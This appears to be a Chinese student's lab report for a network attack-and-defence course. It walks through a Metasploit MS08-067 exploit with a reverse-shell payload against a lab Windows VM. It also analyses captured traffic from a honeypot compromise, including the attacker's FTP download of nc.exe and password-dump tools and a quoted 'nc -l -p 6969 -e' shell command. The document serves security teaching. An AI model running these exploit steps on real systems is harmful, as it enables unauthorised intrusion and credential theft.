20231902吴文亮 2023-2024-2 《网络攻防实践》第6周作业

20231902 吴文亮 2024-07-11 13:32:45

一、实验要求

1.1 动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验

具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

1.2 取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。

攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

1.3 团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

二、实践过程

2.1 远程渗透统计实验
在Kali虚拟机中启动Metasploit
使用命令service postgresql start 启动PostgreSQL服务
使用命令msfdb init 初始化Metasploit PostgreSQL数据库
使用命令msfconsole 启动metasploit

img


img

使用命令search ms08_067搜寻漏洞情况

img

使用命令use windows/smb/ms08_067_netapi表明将ms08_067作为目标漏洞

img

使用命令show payloads查看有效的攻击载荷

img


img

使用命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接

img

使用命令show options查看需要设置的参数,即攻击机与靶机的IP地址。

img

使用命令set LHOST 192.168.200.6设置攻击机Kali;

img

使用命令set RHOST 192.168.200.124设置靶机

img

使用命令show targets查看可设置的操作系统类型

img

使用命令set TARGET 0表示自动识别。

img

输入命令exploit进行攻击

img


img

输入ipconfig可以查看靶机自己的IP地址,攻击成功

img

2.2 取证分析实践:解码一次成功的NT系统破解攻击
使用wireshark打开snort文件,设置过滤条件 ip.dst == 172.16.1.106 and http,通过分析数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机

img


img

继续查看数据可知攻击者访问了boot.ini文件,并且通过分析数据内容发现攻击为Unicode攻击

img


img

右键追踪TCP流,分析数据发现其已经控制了靶机

img


img

继续往后查找信息,发现其中包含了select * from xxx的sql注入攻击,

img

在Wireshark中输入ftp进行筛选,发现1106行的ftp连接成功,右键追踪TCP流,数据表明攻击者通过创建了ftpcom脚本,使用ftp连接 nether.net,并以johna2k为用户、haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll

img

继续往后查询发现攻击者执行了命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限

img

继续往后查看,可以看到其删除了http的文件,猜测攻击者准备撤退

img

再往后查看发现攻击者已经发现他的目标是一台蜜罐主机

img

2.3 团队对抗实践:windows系统远程渗透攻击和分析
kali启动msfconsole
输入指令为:use exploit/windows/smb/ms08_067_netapi 进入漏洞所在文件
设置攻击机kali IP:192.168.200.13,Win2k IP:192.168.200.124

img


img


img

连接后,在C盘创建文件,并写入内容。在此步记得同时打开wireshark抓包。
之后便可在Win2k靶机中发现我创建的文件夹以及写入的内容

img

wireshark中追踪TCP流也可查询到相关操作

img

三、学习中遇到的问题及解决方法

  • 问题1:win2k和kali无法ping通
  • 问题1解决方案:将其连接模式改为实验1时候的模式,且打开honey密网。

四 学习感想和体会

通过本次实验,我了解了Windows的安全机制,以及基本的渗透攻击的攻击过程,并且在团队对抗中进行了一次简单的实验,进一步加深映像。

...全文
140 回复 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

54

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防实践课程
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧